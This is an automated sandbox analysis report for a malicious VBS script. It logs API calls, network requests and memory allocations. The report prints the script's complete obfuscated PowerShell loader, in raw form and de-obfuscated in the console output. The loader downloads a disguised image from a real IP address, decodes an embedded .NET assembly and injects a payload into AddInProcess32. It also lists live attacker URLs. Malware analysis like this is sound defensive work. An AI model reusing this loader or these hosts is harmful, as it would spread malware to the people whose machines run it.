
eveningfiledatinglover.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 July 4, 2024, 10:39 a.m. July 4, 2024, 10:41 a.m.
Size 3.4KB
Type Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
MD5 e69758681e577aa06dfa9425821283b6
SHA256 61eb554843c600f6721a79589a31c5c198308ba747c1504af03f5099f6dfdd69
CRC32 954FC5E1
ssdeep 96:c4ZP+quO+uCBZPWH9rd9rQ9r2JZPp9rNU:zhIh8pdpQp2Jhppi
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\eveningfiledatinglover.vbs

    2560
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"

      2692

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
91.92.254.14 Active Moloch
91.92.254.194 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:917
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) }
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes =
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: .4446sabbbbbbbewmadam/441.871.64.891//:ptth' , 'desativado' , 'desativado' , 'd
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: esativado','AddInProcess32','')) } }
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000000fb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ca910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ca750
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ca750
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ca750
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb010
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb3d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb3d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.254.14/Users_API/negrocock/file_in0kfcuh.ojw.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://91.92.254.194/imge/new-image_v.jpg
request GET http://91.92.254.14/Users_API/negrocock/file_in0kfcuh.ojw.txt
request GET http://91.92.254.194/imge/new-image_v.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71951000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71952000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
